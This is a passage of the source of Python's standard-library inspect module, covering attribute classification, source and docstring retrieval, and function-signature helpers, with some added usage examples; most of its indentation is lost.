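#   >>> names = [name for name, obj in inspect.getmembers(os.path, inspect.isfunction)]
#   >>> 'join' in names
#   True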
Attribute = namedtuple('Attribute', 'name kind defining_class object')
def classify_class_attrs(cls):
"""Return list of attribute-descriptor tuples.
For each name in dir(cls), the return list contains a 4-tuple
with these elements:
0. The name (a string).
1. The kind of attribute this is, one of these strings:
'class method' created via classmethod()
'static method' created via staticmethod()
'property' created via property()
'method' any other flavor of method or descriptor
'data' not a method
2. The class which defined this attribute (a class).
3. The object as obtained by calling getattr; if this fails, or if the
resulting object does not live anywhere in the class' mro (including
metaclasses) then the object is looked up in the defining class's
dict (found by walking the mro).
If one of the items in dir(cls) is stored in the metaclass it will now
be discovered and not have None be listed as the class in which it was
defined. Any items whose home class cannot be discovered are skipped.
"""
mro = getmro(cls)
metamro = getmro(type(cls)) # for attributes stored in the metaclass
metamro = tuple(cls for cls in metamro if cls not in (type, object))
class_bases = (cls,) + mro
all_bases = class_bases + metamro
names = dir(cls)
    # Add any DynamicClassAttributes to the list of names;
# this may result in duplicate entries if, for example, a virtual
# attribute with the same name as a DynamicClassAttribute exists.
for base in mro:
for k, v in base.__dict__.items():
if isinstance(v, types.DynamicClassAttribute):
names.append(k)
result = []
processed = set()
for name in names:
# Get the object associated with the name, and where it was defined.
# Normal objects will be looked up with both getattr and directly in
# its class' dict (in case getattr fails [bug #1785], and also to look
# for a docstring).
# For DynamicClassAttributes on the second pass we only look in the
# class's dict.
#
# Getting an obj from the __dict__ sometimes reveals more than
# using getattr. Static and class methods are dramatic examples.
homecls = None
get_obj = None
dict_obj = None
if name not in processed:
try:
if name == '__dict__':
raise Exception("__dict__ is special, don't want the proxy")
get_obj = getattr(cls, name)
except Exception as exc:
pass
else:
homecls = getattr(get_obj, "__objclass__", homecls)
if homecls not in class_bases:
# if the resulting object does not live somewhere in the
# mro, drop it and search the mro manually
homecls = None
last_cls = None
# first look in the classes
for srch_cls in class_bases:
srch_obj = getattr(srch_cls, name, None)
if srch_obj is get_obj:
last_cls = srch_cls
# then check the metaclasses
for srch_cls in metamro:
try:
srch_obj = srch_cls.__getattr__(cls, name)
except AttributeError:
continue
if srch_obj is get_obj:
last_cls = srch_cls
if last_cls is not None:
homecls = last_cls
for base in all_bases:
if name in base.__dict__:
dict_obj = base.__dict__[name]
if homecls not in metamro:
homecls = base
break
if homecls is None:
# unable to locate the attribute anywhere, most likely due to
# buggy custom __dir__; discard and move on
continue
obj = get_obj if get_obj is not None else dict_obj
# Classify the object or its descriptor.
if isinstance(dict_obj, (staticmethod, types.BuiltinMethodType)):
kind = "static method"
obj = dict_obj
elif isinstance(dict_obj, (classmethod, types.ClassMethodDescriptorType)):
kind = "class method"
obj = dict_obj
elif isinstance(dict_obj, property):
kind = "property"
obj = dict_obj
elif isroutine(obj):
kind = "method"
else:
kind = "data"
result.append(Attribute(name, kind, homecls, obj))
processed.add(name)
return result
# ----------------------------------------------------------- class helpers
def getmro(cls):
"Return tuple of base classes (including cls) in method resolution order."
return cls.__mro__
# -------------------------------------------------------- function helpers
def unwrap(func, *, stop=None):
"""Get the object wrapped by *func*.
Follows the chain of :attr:`__wrapped__` attributes returning the last
object in the chain.
*stop* is an optional callback accepting an object in the wrapper chain
as its sole argument that allows the unwrapping to be terminated early if
the callback returns a true value. If the callback never returns a true
value, the last object in the chain is returned as usual. For example,
:func:`signature` uses this to stop unwrapping if any object in the
chain has a ``__signature__`` attribute defined.
:exc:`ValueError` is raised if a cycle is encountered.
"""
if stop is None:
def _is_wrapper(f):
return hasattr(f, '__wrapped__')
else:
def _is_wrapper(f):
return hasattr(f, '__wrapped__') and not stop(f)
f = func # remember the original func for error reporting
# Memoise by id to tolerate non-hashable objects, but store objects to
# ensure they aren't destroyed, which would allow their IDs to be reused.
memo = {id(f): f}
recursion_limit = sys.getrecursionlimit()
while _is_wrapper(func):
func = func.__wrapped__
id_func = id(func)
if (id_func in memo) or (len(memo) >= recursion_limit):
raise ValueError('wrapper loop when unwrapping {!r}'.format(f))
memo[id_func] = func
return func
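# Illustrative example (added note, not part of the stdlib source): functools.wraps()
# sets __wrapped__ on the wrapper it creates, which is exactly the chain unwrap() follows.
#
#   >>> import functools, inspect
#   >>> def deco(f):
#   ...     @functools.wraps(f)
#   ...     def wrapper(*args, **kwargs):
#   ...         return f(*args, **kwargs)
#   ...     return wrapper
#   >>> @deco
#   ... def greet(): pass
#   >>> inspect.unwrap(greet) is greet.__wrapped__
#   True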
# -------------------------------------------------- source code extraction
def indentsize(line):
"""Return the indent size, in spaces, at the start of a line of text."""
expline = line.expandtabs()
return len(expline) - len(expline.lstrip())
def _findclass(func):
cls = sys.modules.get(func.__module__)
if cls is None:
return None
for name in func.__qualname__.split('.')[:-1]:
cls = getattr(cls, name)
if not isclass(cls):
return None
return cls
def _finddoc(obj):
if isclass(obj):
for base in obj.__mro__:
if base is not object:
try:
doc = base.__doc__
except AttributeError:
continue
if doc is not None:
return doc
return None
if ismethod(obj):
name = obj.__func__.__name__
self = obj.__self__
if (isclass(self) and
getattr(getattr(self, name, None), '__func__') is obj.__func__):
# classmethod
cls = self
else:
cls = self.__class__
elif isfunction(obj):
name = obj.__name__
cls = _findclass(obj)
if cls is None or getattr(cls, name) is not obj:
return None
elif isbuiltin(obj):
name = obj.__name__
self = obj.__self__
if (isclass(self) and
self.__qualname__ + '.' + name == obj.__qualname__):
# classmethod
cls = self
else:
cls = self.__class__
# Should be tested before isdatadescriptor().
elif isinstance(obj, property):
func = obj.fget
name = func.__name__
cls = _findclass(func)
if cls is None or getattr(cls, name) is not obj:
return None
elif ismethoddescriptor(obj) or isdatadescriptor(obj):
name = obj.__name__
cls = obj.__objclass__
if getattr(cls, name) is not obj:
return None
else:
return None
for base in cls.__mro__:
try:
doc = getattr(base, name).__doc__
except AttributeError:
continue
if doc is not None:
return doc
return None
def getdoc(object):
"""Get the documentation string for an object.
All tabs are expanded to spaces. To clean up docstrings that are
indented to line up with blocks of code, any whitespace than can be
uniformly removed from the second line onwards is removed."""
try:
doc = object.__doc__
except AttributeError:
return None
if doc is None:
try:
doc = _finddoc(object)
except (AttributeError, TypeError):
return None
if not isinstance(doc, str):
return None
return cleandoc(doc)
def cleandoc(doc):
"""Clean up indentation from docstrings.
Any whitespace that can be uniformly removed from the second line
onwards is removed."""
try:
lines = doc.expandtabs().split('\n')
except UnicodeError:
return None
else:
# Find minimum indentation of any non-blank lines after first line.
margin = sys.maxsize
for line in lines[1:]:
content = len(line.lstrip())
if content:
indent = len(line) - content
margin = min(margin, indent)
# Remove indentation.
if lines:
lines[0] = lines[0].lstrip()
if margin < sys.maxsize:
for i in range(1, len(lines)): lines[i] = lines[i][margin:]
# Remove any trailing or leading blank lines.
while lines and not lines[-1]:
lines.pop()
while lines and not lines[0]:
lines.pop(0)
return '\n'.join(lines)
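# Illustrative example (added note, not part of the stdlib source): cleandoc() strips the
# uniform indentation that triple-quoted docstrings usually carry.
#
#   >>> import inspect
#   >>> inspect.cleandoc('Summary line.\n    indented detail')
#   'Summary line.\nindented detail'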
def getfile(object):
"""Work out which source or compiled file an object was defined in."""
if ismodule(object):
if getattr(object, '__file__', None):
return object.__file__
raise TypeError('{!r} is a built-in module'.format(object))
if isclass(object):
if hasattr(object, '__module__'):
object = sys.modules.get(object.__module__)
if getattr(object, '__file__', None):
return object.__file__
raise TypeError('{!r} is a built-in class'.format(object))
if ismethod(object):
object = object.__func__
if isfunction(object):
object = object.__code__
if istraceback(object):
object = object.tb_frame
if isframe(object):
object = object.f_code
if iscode(object):
return object.co_filename
raise TypeError('module, class, method, function, traceback, frame, or '
'code object was expected, got {}'.format(
type(object).__name__))
def getmodulename(path):
"""Return the module name for a given file, or None."""
fname = os.path.basename(path)
# Check for paths that look like an actual module file
suffixes = [(-len(suffix), suffix)
for suffix in importlib.machinery.all_suffixes()]
suffixes.sort() # try longest suffixes first, in case they overlap
for neglen, suffix in suffixes:
if fname.endswith(suffix):
return fname[:neglen]
return None
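# Illustrative example (added note, not part of the stdlib source): the suffix list comes
# from importlib, so ordinary .py paths reduce to their bare module name.
#
#   >>> import inspect
#   >>> inspect.getmodulename('/usr/lib/python3/dist-packages/foo/bar.py')
#   'bar'
#   >>> inspect.getmodulename('notes.txt') is None
#   True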
def getsourcefile(object):
"""Return the filename that can be used to locate an object's source.
Return None if no way can be identified to get the source.
"""
filename = getfile(object)
all_bytecode_suffixes = importlib.machinery.DEBUG_BYTECODE_SUFFIXES[:]
all_bytecode_suffixes += importlib.machinery.OPTIMIZED_BYTECODE_SUFFIXES[:]
if any(filename.endswith(s) for s in all_bytecode_suffixes):
filename = (os.path.splitext(filename)[0] +
importlib.machinery.SOURCE_SUFFIXES[0])
elif any(filename.endswith(s) for s in
importlib.machinery.EXTENSION_SUFFIXES):
return None
if os.path.exists(filename):
return filename
# only return a non-existent filename if the module has a PEP 302 loader
if getattr(getmodule(object, filename), '__loader__', None) is not None:
return filename
# or it is in the linecache
if filename in linecache.cache:
return filename
def getabsfile(object, _filename=None):
"""Return an absolute path to the source or compiled file for an object.
The idea is for each object to have a unique origin, so this routine
normalizes the result as much as possible."""
if _filename is None:
_filename = getsourcefile(object) or getfile(object)
return os.path.normcase(os.path.abspath(_filename))
modulesbyfile = {}
_filesbymodname = {}
def getmodule(object, _filename=None):
"""Return the module an object was defined in, or None if not found."""
if ismodule(object):
return object
if hasattr(object, '__module__'):
return sys.modules.get(object.__module__)
# Try the filename to modulename cache
if _filename is not None and _filename in modulesbyfile:
return sys.modules.get(modulesbyfile[_filename])
# Try the cache again with the absolute file name
try:
file = getabsfile(object, _filename)
except TypeError:
return None
if file in modulesbyfile:
return sys.modules.get(modulesbyfile[file])
# Update the filename to module name cache and check yet again
# Copy sys.modules in order to cope with changes while iterating
for modname, module in list(sys.modules.items()):
if ismodule(module) and hasattr(module, '__file__'):
f = module.__file__
if f == _filesbymodname.get(modname, None):
# Have already mapped this module, so skip it
continue
_filesbymodname[modname] = f
f = getabsfile(module)
# Always map to the name the module knows itself by
modulesbyfile[f] = modulesbyfile[
os.path.realpath(f)] = module.__name__
if file in modulesbyfile:
return sys.modules.get(modulesbyfile[file])
# Check the main module
main = sys.modules['__main__']
if not hasattr(object, '__name__'):
return None
if hasattr(main, object.__name__):
mainobject = getattr(main, object.__name__)
if mainobject is object:
return main
# Check builtins
builtin = sys.modules['builtins']
if hasattr(builtin, object.__name__):
builtinobject = getattr(builtin, object.__name__)
if builtinobject is object:
return builtin
def findsource(object):
"""Return the entire source file and starting line number for an object.
The argument may be a module, class, method, function, traceback, frame,
or code object. The source code is returned as a list of all the lines
in the file and the line number indexes a line in that list. An OSError
is raised if the source code cannot be retrieved."""
file = getsourcefile(object)
if file:
# Invalidate cache if needed.
linecache.checkcache(file)
else:
file = getfile(object)
# Allow filenames in form of "<something>" to pass through.
# `doctest` monkeypatches `linecache` module to enable
# inspection, so let `linecache.getlines` to be called.
if not (file.startswith('<') and file.endswith('>')):
raise OSError('source code not available')
module = getmodule(object, file)
if module:
lines = linecache.getlines(file, module.__dict__)
else:
lines = linecache.getlines(file)
if not lines:
raise OSError('could not get source code')
if ismodule(object):
return lines, 0
if isclass(object):
name = object.__name__
pat = re.compile(r'^(\s*)class\s*' + name + r'\b')
# make some effort to find the best matching class definition:
# use the one with the least indentation, which is the one
# that's most probably not inside a function definition.
candidates = []
for i in range(len(lines)):
match = pat.match(lines[i])
if match:
# if it's at toplevel, it's already the best one
if lines[i][0] == 'c':
return lines, i
# else add whitespace to candidate list
candidates.append((match.group(1), i))
if candidates:
# this will sort by whitespace, and by line number,
# less whitespace first
candidates.sort()
return lines, candidates[0][1]
else:
raise OSError('could not find class definition')
if ismethod(object):
object = object.__func__
if isfunction(object):
object = object.__code__
if istraceback(object):
object = object.tb_frame
if isframe(object):
object = object.f_code
if iscode(object):
if not hasattr(object, 'co_firstlineno'):
raise OSError('could not find function definition')
lnum = object.co_firstlineno - 1
pat = re.compile(r'^(\s*def\s)|(\s*async\s+def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)')
while lnum > 0:
if pat.match(lines[lnum]): break
lnum = lnum - 1
return lines, lnum
raise OSError('could not find code object')
def getcomments(object):
"""Get lines of comments immediately preceding an object's source code.
Returns None when source can't be found.
"""
try:
lines, lnum = findsource(object)
except (OSError, TypeError):
return None
if ismodule(object):
# Look for a comment block at the top of the file.
start = 0
if lines and lines[0][:2] == '#!': start = 1
while start < len(lines) and lines[start].strip() in ('', '#'):
start = start + 1
if start < len(lines) and lines[start][:1] == '#':
comments = []
end = start
while end < len(lines) and lines[end][:1] == '#':
comments.append(lines[end].expandtabs())
end = end + 1
return ''.join(comments)
# Look for a preceding block of comments at the same indentation.
elif lnum > 0:
indent = indentsize(lines[lnum])
end = lnum - 1
if end >= 0 and lines[end].lstrip()[:1] == '#' and \
indentsize(lines[end]) == indent:
comments = [lines[end].expandtabs().lstrip()]
if end > 0:
end = end - 1
comment = lines[end].expandtabs().lstrip()
while comment[:1] == '#' and indentsize(lines[end]) == indent:
comments[:0] = [comment]
end = end - 1
if end < 0: break
comment = lines[end].expandtabs().lstrip()
while comments and comments[0].strip() == '#':
comments[:1] = []
while comments and comments[-1].strip() == '#':
comments[-1:] = []
return ''.join(comments)
class EndOfBlock(Exception): pass
class BlockFinder:
"""Provide a tokeneater() method to detect the end of a code block."""
def __init__(self):
self.indent = 0
self.islambda = False
self.started = False
self.passline = False
self.indecorator = False
self.decoratorhasargs = False
self.last = 1
def tokeneater(self, type, token, srowcol, erowcol, line):
if not self.started and not self.indecorator:
# skip any decorators
if token == "@":
self.indecorator = True
# look for the first "def", "class" or "lambda"
elif token in ("def", "class", "lambda"):
if token == "lambda":
self.islambda = True
self.started = True
self.passline = True # skip to the end of the line
elif token == "(":
if self.indecorator:
self.decoratorhasargs = True
elif token == ")":
if self.indecorator:
self.indecorator = False
self.decoratorhasargs = False
elif type == tokenize.NEWLINE:
self.passline = False # stop skipping when a NEWLINE is seen
self.last = srowcol[0]
if self.islambda: # lambdas always end at the first NEWLINE
raise EndOfBlock
# hitting a NEWLINE when in a decorator without args
# ends the decorator
if self.indecorator and not self.decoratorhasargs:
self.indecorator = False
elif self.passline:
pass
elif type == tokenize.INDENT:
self.indent = self.indent + 1
self.passline = True
elif type == tokenize.DEDENT:
self.indent = self.indent - 1
# the end of matching indent/dedent pairs end a block
# (note that this only works for "def"/"class" blocks,
# not e.g. for "if: else:" or "try: finally:" blocks)
if self.indent <= 0:
raise EndOfBlock
elif self.indent == 0 and type not in (tokenize.COMMENT, tokenize.NL):
# any other token on the same indentation level end the previous
# block as well, except the pseudo-tokens COMMENT and NL.
raise EndOfBlock
def getblock(lines):
"""Extract the block of code at the top of the given list of lines."""
blockfinder = BlockFinder()
try:
tokens = tokenize.generate_tokens(iter(lines).__next__)
for _token in tokens:
blockfinder.tokeneater(*_token)
except (EndOfBlock, IndentationError):
pass
return lines[:blockfinder.last]
def getsourcelines(object):
"""Return a list of source lines and starting line number for an object.
The argument may be a module, class, method, function, traceback, frame,
or code object. The source code is returned as a list of the lines
corresponding to the object and the line number indicates where in the
original source file the first line of code was found. An OSError is
raised if the source code cannot be retrieved."""
object = unwrap(object)
lines, lnum = findsource(object)
if istraceback(object):
object = object.tb_frame
# for module or frame that corresponds to module, return all source lines
if (ismodule(object) or
(isframe(object) and object.f_code.co_name == "<module>")):
return lines, 0
else:
return getblock(lines[lnum:]), lnum + 1
def getsource(object):
"""Return the text of the source code for an object.
The argument may be a module, class, method, function, traceback, frame,
or code object. The source code is returned as a single string. An
OSError is raised if the source code cannot be retrieved."""
lines, lnum = getsourcelines(object)
return ''.join(lines)
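# Illustrative example (added note, not part of the stdlib source): getsource() builds on
# findsource() and getblock(), so it works on anything with reachable source, including
# functions defined in this module.
#
#   >>> import inspect
#   >>> text = inspect.getsource(inspect.getmodulename)
#   >>> text.startswith('def getmodulename(path):')
#   True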
# --------------------------------------------------- class tree extraction
def walktree(classes, children, parent):
"""Recursive helper function for getclasstree()."""
results = []
classes.sort(key=attrgetter('__module__', '__name__'))
for c in classes:
results.append((c, c.__bases__))
if c in children:
results.append(walktree(children[c], children, c))
return results
def getclasstree(classes, unique=False):
"""Arrange the given list of classes into a hierarchy of nested lists.
Where a nested list appears, it contains classes derived from the class
whose entry immediately precedes the list. Each entry is a 2-tuple
containing a class and a tuple of its base classes. If the 'unique'
argument is true, exactly one entry appears in the returned structure
for each class in the given list. Otherwise, classes using multiple
inheritance and their descendants will appear multiple times."""
children = {}
roots = []
for c in classes:
if c.__bases__:
for parent in c.__bases__:
if not parent in children:
children[parent] = []
if c not in children[parent]:
children[parent].append(c)
if unique and parent in classes: break
elif c not in roots:
roots.append(c)
for parent in children:
if parent not in classes:
roots.append(parent)
return walktree(roots, children, None)
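# Illustrative example (added note, not part of the stdlib source): the returned structure
# nests a list of subclasses directly after their parent's entry, and implicit roots (here
# `object`) are pulled in automatically.
#
#   >>> import inspect
#   >>> class A: pass
#   >>> class B(A): pass
#   >>> tree = inspect.getclasstree([A, B])
#   >>> tree[0][0] is object and tree[1][0][0] is A and tree[1][1][0][0] is B
#   True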
# ------------------------------------------------ argument list extraction
Arguments = namedtuple('Arguments', 'args, varargs, varkw')
def getargs(co):
"""Get information about the arguments accepted by a code object.
Three things are returned: (args, varargs, varkw), where
'args' is the list of argument names. Keyword-only arguments are
appended. 'varargs' and 'varkw' are the names of the * and **
arguments or None."""
args, varargs, kwonlyargs, varkw = _getfullargs(co)
return Arguments(args + kwonlyargs, varargs, varkw)
def _getfullargs(co):
"""Get information about the arguments accepted by a code object.
Four things are returned: (args, varargs, kwonlyargs, varkw), where
'args' and 'kwonlyargs' are lists of argument names, and 'varargs'
and 'varkw' are the names of the * and ** arguments or None."""
if not iscode(co):
raise TypeError('{!r} is not a code object'.format(co))
nargs = co.co_argcount
names = co.co_varnames
nkwargs = co.co_kwonlyargcount
args = list(names[:nargs])
kwonlyargs = list(names[nargs:nargs+nkwargs])
step = 0
nargs += nkwargs
varargs = None
if co.co_flags & CO_VARARGS:
varargs = co.co_varnames[nargs]
nargs = nargs + 1
varkw = None
if co.co_flags & CO_VARKEYWORDS:
varkw = co.co_varnames[nargs]
return args, varargs, kwonlyargs, varkw
ArgSpec = namedtuple('ArgSpec', 'args varargs keywords defaults')
def getargspec(func):
"""Get the names and default values of a function's parameters.
A tuple of four things is returned: (args, varargs, keywords, defaults).
'args' is a list of the argument names, including keyword-only argument names.
'varargs' and 'keywords' are the names of the * and ** parameters or None.
'defaults' is an n-tuple of the default values of the last n parameters.
This function is deprecated, as it does not support annotations or
keyword-only parameters and will raise ValueError if either is present
on the supplied callable.
For a more structured introspection API, use inspect.signature() instead.
Alternatively, use getfullargspec() for an API with a similar namedtuple
based interface, but full support for annotations and keyword-only
parameters.
Deprecated since Python 3.5, use `inspect.getfullargspec()`.
"""
warnings.warn("inspect.getargspec() is deprecated since Python 3.0, "
"use inspect.signature() or inspect.getfullargspec()",
DeprecationWarning, stacklevel=2)
args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, ann = \
getfullargspec(func)
if kwonlyargs or ann:
raise ValueError("Function has keyword-only parameters or annotations"
", use getfullargspec() API which can support them")
return ArgSpec(args, varargs, varkw, defaults)
FullArgSpec = namedtuple('FullArgSpec',
'args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, annotations')
def getfullargspec(func):
"""Get the names and default values of a callable object's parameters.
A tuple of seven things is returned:
(args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, annotations).
'args' is a list of the parameter names.
'varargs' and 'varkw' are the names of the * and ** parameters or None.
'defaults' is an n-tuple of the default values of the last n parameters.
'kwonlyargs' is a list of keyword-only parameter names.
'kwonlydefaults' is a dictionary mapping names from kwonlyargs to defaults.
'annotations' is a dictionary mapping parameter names to annotations.
Notable differences from inspect.signature():
- the "self" parameter is always reported, even for bound methods
- wrapper chains defined by __wrapped__ *not* unwrapped automatically
"""
try:
# Re: `skip_bound_arg=False`
#
# There is a notable difference in behaviour between getfullargspec
# and Signature: the former always returns 'self' parameter for bound
# methods, whereas the Signature always shows the actual calling
# signature of the passed object.
#
# To simulate this behaviour, we "unbind" bound methods, to trick
# inspect.signature to always return their first parameter ("self",
# usually)
# Re: `follow_wrapper_chains=False`
#
# getfullargspec() historically ignored __wrapped__ attributes,
# so we ensure that remains the case in 3.3+
sig = _signature_from_callable(func,
follow_wrapper_chains=False,
skip_bound_arg=False,
sigcls=Signature)
except Exception as ex:
# Most of the times 'signature' will raise ValueError.
# But, it can also raise AttributeError, and, maybe something
# else. So to be fully backwards compatible, we catch all
# possible exceptions here, and reraise a TypeError.
raise TypeError('unsupported callable') from ex
args = []
varargs = None
varkw = None
kwonlyargs = []
defaults = ()
annotations = {}
defaults = ()
kwdefaults = {}
if sig.return_annotation is not sig.empty:
annotations['return'] = sig.return_annotation
for param in sig.parameters.values():
kind = param.kind
name = param.name
if kind is _POSITIONAL_ONLY:
args.append(name)
elif kind is _POSITIONAL_OR_KEYWORD:
args.append(name)
if param.default is not param.empty:
defaults += (param.default,)
elif kind is _VAR_POSITIONAL:
varargs = name
elif kind is _KEYWORD_ONLY:
kwonlyargs.append(name)
if param.default is not param.empty:
kwdefaults[name] = param.default
elif kind is _VAR_KEYWORD:
varkw = name
if param.annotation is not param.empty:
annotations[name] = param.annotation
if not kwdefaults:
# compatibility with 'func.__kwdefaults__'
kwdefaults = None
if not defaults:
# compatibility with 'func.__defaults__'
defaults = None
return FullArgSpec(args, varargs, varkw, defaults,
kwonlyargs, kwdefaults, annotations)
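# Illustrative example (added note, not part of the stdlib source): unlike the deprecated
# getargspec(), getfullargspec() reports keyword-only parameters and annotations in
# separate fields.
#
#   >>> import inspect
#   >>> def f(a, b=1, *rest, c, **extra): pass
#   >>> inspect.getfullargspec(f)
#   FullArgSpec(args=['a', 'b'], varargs='rest', varkw='extra', defaults=(1,), kwonlyargs=['c'], kwonlydefaults=None, annotations={})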
ArgInfo = namedtuple('ArgInfo', 'args varargs keywords locals')
def getargvalues(frame):
"""Get information about arguments passed into a particular frame.
A tuple of four things is returned: (args, varargs, varkw, locals).
'args' is a list of the argument names.
'varargs' and 'varkw' are the names of the * and ** arguments or None.
'locals' is the locals dictionary of the given frame."""
args, varargs, varkw = getargs(frame.f_code)
return ArgInfo(args, varargs, varkw, frame.f_locals)
def formatannotation(annotation, base_module=None):
if getattr(annotation, '__module__', None) == 'typing':
return repr(annotation).replace('typing.', '')
if isinstance(annotation, type):
if annotation.__module__ in ('builtins', base_module):
return annotation.__qualname__
return annotation.__module__+'.'+annotation.__qualname__
return repr(annotation)
def formatannotationrelativeto(object):
module = getattr(object, '__module__', None)
def _formatannotation(annotation):
return formatannotation(annotation, module)
return _formatannotation
def formatargspec(args, varargs=None, varkw=None, defaults=None,
kwonlyargs=(), kwonlydefaults={}, annotations={},
formatarg=str,
formatvarargs=lambda name: '*' + name,
formatvarkw=lambda name: '**' + name,
formatvalue=lambda value: '=' + repr(value),
formatreturns=lambda text: ' -> ' + text,
formatannotation=formatannotation):
"""Format an argument spec from the values returned by getfullargspec.
The first seven arguments are (args, varargs, varkw, defaults,
kwonlyargs, kwonlydefaults, annotations). The other five arguments
are the corresponding optional formatting functions that are called to
turn names and values into strings. The last argument is an optional
function to format the sequence of arguments.
Deprecated since Python 3.5: use the `signature` function and `Signature`
objects.
"""
from warnings import warn
warn("`formatargspec` is deprecated since Python 3.5. Use `signature` and "
"the `Signature` object directly",
DeprecationWarning,
stacklevel=2)
def formatargandannotation(arg):
result = formatarg(arg)
if arg in annotations:
result += ': ' + formatannotation(annotations[arg])
return result
specs = []
if defaults:
firstdefault = len(args) - len(defaults)
for i, arg in enumerate(args):
spec = formatargandannotation(arg)
if defaults and i >= firstdefault:
spec = spec + formatvalue(defaults[i - firstdefault])
specs.append(spec)
if varargs is not None:
specs.append(formatvarargs(formatargandannotation(varargs)))
else:
if kwonlyargs:
specs.append('*')
if kwonlyargs:
for kwonlyarg in kwonlyargs:
spec = formatargandannotation(kwonlyarg)
if kwonlydefaults and kwonlyarg in kwonlydefaults:
spec += formatvalue(kwonlydefaults[kwonlyarg])
specs.append(spec)
if varkw is not None:
specs.append(formatvarkw(formatargandannotation(varkw)))
result = '(' + ', '.join(specs) + ')'
if 'return' in annotations:
result += formatreturns(formatannotation(annotations['return']))
return result
def formatargvalues(args, varargs, varkw, locals,
formatarg=str,
formatvarargs=lambda name: '*' + name,
formatvarkw=lambda name: '**' + name,
formatvalue=lambda value: '=' + repr(value)):
"""Format an argument spec from the 4 values returned by getargvalues.
The first four arguments are (args, varargs, varkw, locals). The
next four arguments are the corresponding optional formatting functions
    that are called to turn names and values into strings."""
def convert(name, locals=locals,
formatarg=formatarg, formatvalue=formatvalue):
return formatarg(name) + formatvalue(locals[name])
specs = []
for i in range(len(args)):
specs.append(convert(args[i]))
if varargs:
specs.append(formatvarargs(varargs) + formatvalue(locals[varargs]))
if varkw:
specs.append(formatvarkw(varkw) + formatvalue(locals[varkw]))
return '(' + ', '.join(specs) + ')'
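# Illustrative sketch (not part of the original module): combining
# getargvalues() with formatargvalues() to render a live call frame.  The
# helper and its inner function are hypothetical names for demonstration.
def _example_formatargvalues():
    def sample(x, *rest, **extra):
        frame = currentframe()
        return formatargvalues(*getargvalues(frame))
    # The call below renders as "(x=1, *rest=(2,), **extra={'three': 3})".
    return sample(1, 2, three=3)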
def _missing_arguments(f_name, argnames, pos, values):
names = [repr(name) for name in argnames if name not in values]
missing = len(names)
if missing == 1:
s = names[0]
elif missing == 2:
s = "{} and {}".format(*names)
else:
tail = ", {} and {}".format(*names[-2:])
del names[-2:]
s = ", ".join(names) + tail
raise TypeError("%s() missing %i required %s argument%s: %s" %
(f_name, missing,
"positional" if pos else "keyword-only",
"" if missing == 1 else "s", s))
def _too_many(f_name, args, kwonly, varargs, defcount, given, values):
atleast = len(args) - defcount
kwonly_given = len([arg for arg in kwonly if arg in values])
if varargs:
plural = atleast != 1
sig = "at least %d" % (atleast,)
elif defcount:
plural = True
sig = "from %d to %d" % (atleast, len(args))
else:
plural = len(args) != 1
sig = str(len(args))
kwonly_sig = ""
if kwonly_given:
msg = " positional argument%s (and %d keyword-only argument%s)"
kwonly_sig = (msg % ("s" if given != 1 else "", kwonly_given,
"s" if kwonly_given != 1 else ""))
raise TypeError("%s() takes %s positional argument%s but %d%s %s given" %
(f_name, sig, "s" if plural else "", given, kwonly_sig,
"was" if given == 1 and not kwonly_given else "were"))
def getcallargs(*func_and_positional, **named):
"""Get the mapping of arguments to values.
A dict is returned, with keys the function argument names (including the
names of the * and ** arguments, if any), and values the respective bound
values from 'positional' and 'named'."""
func = func_and_positional[0]
positional = func_and_positional[1:]
spec = getfullargspec(func)
args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, ann = spec
f_name = func.__name__
arg2value = {}
if ismethod(func) and func.__self__ is not None:
# implicit 'self' (or 'cls' for classmethods) argument
positional = (func.__self__,) + positional
num_pos = len(positional)
num_args = len(args)
num_defaults = len(defaults) if defaults else 0
n = min(num_pos, num_args)
for i in range(n):
arg2value[args[i]] = positional[i]
if varargs:
arg2value[varargs] = tuple(positional[n:])
possible_kwargs = set(args + kwonlyargs)
if varkw:
arg2value[varkw] = {}
for kw, value in named.items():
if kw not in possible_kwargs:
if not varkw:
raise TypeError("%s() got an unexpected keyword argument %r" %
(f_name, kw))
arg2value[varkw][kw] = value
continue
if kw in arg2value:
raise TypeError("%s() got multiple values for argument %r" %
(f_name, kw))
arg2value[kw] = value
if num_pos > num_args and not varargs:
_too_many(f_name, args, kwonlyargs, varargs, num_defaults,
num_pos, arg2value)
if num_pos < num_args:
req = args[:num_args - num_defaults]
for arg in req:
if arg not in arg2value:
_missing_arguments(f_name, req, True, arg2value)
for i, arg in enumerate(args[num_args - num_defaults:]):
if arg not in arg2value:
arg2value[arg] = defaults[i]
missing = 0
for kwarg in kwonlyargs:
if kwarg not in arg2value:
if kwonlydefaults and kwarg in kwonlydefaults:
arg2value[kwarg] = kwonlydefaults[kwarg]
else:
missing += 1
if missing:
_missing_arguments(f_name, kwonlyargs, False, arg2value)
return arg2value
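# Illustrative sketch (not part of the original module): getcallargs() maps a
# prospective call onto parameter names without invoking the function.  The
# helper and sample function names are hypothetical.
def _example_getcallargs():
    def sample(a, b=10, *rest, **extra):
        return a
    mapping = getcallargs(sample, 1, 2, 3, flag=True)
    # mapping == {'a': 1, 'b': 2, 'rest': (3,), 'extra': {'flag': True}}
    return mapping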
ClosureVars = namedtuple('ClosureVars', 'nonlocals globals builtins unbound')
def getclosurevars(func):
"""
Get the mapping of free variables to their current values.
Returns a named tuple of dicts mapping the current nonlocal, global
and builtin references as seen by the body of the function. A final
set of unbound names that could not be resolved is also provided.
"""
if ismethod(func):
func = func.__func__
if not isfunction(func):
raise TypeError("{!r} is not a Python function".format(func))
code = func.__code__
# Nonlocal references are named in co_freevars and resolved
# by looking them up in __closure__ by positional index
if func.__closure__ is None:
nonlocal_vars = {}
else:
nonlocal_vars = {
var : cell.cell_contents
for var, cell in zip(code.co_freevars, func.__closure__)
}
# Global and builtin references are named in co_names and resolved
# by looking them up in __globals__ or __builtins__
global_ns = func.__globals__
builtin_ns = global_ns.get("__builtins__", builtins.__dict__)
if ismodule(builtin_ns):
builtin_ns = builtin_ns.__dict__
global_vars = {}
builtin_vars = {}
unbound_names = set()
for name in code.co_names:
if name in ("None", "True", "False"):
# Because these used to be builtins instead of keywords, they
# may still show up as name references. We ignore them.
continue
try:
global_vars[name] = global_ns[name]
except KeyError:
try:
builtin_vars[name] = builtin_ns[name]
except KeyError:
unbound_names.add(name)
return ClosureVars(nonlocal_vars, global_vars,
builtin_vars, unbound_names)
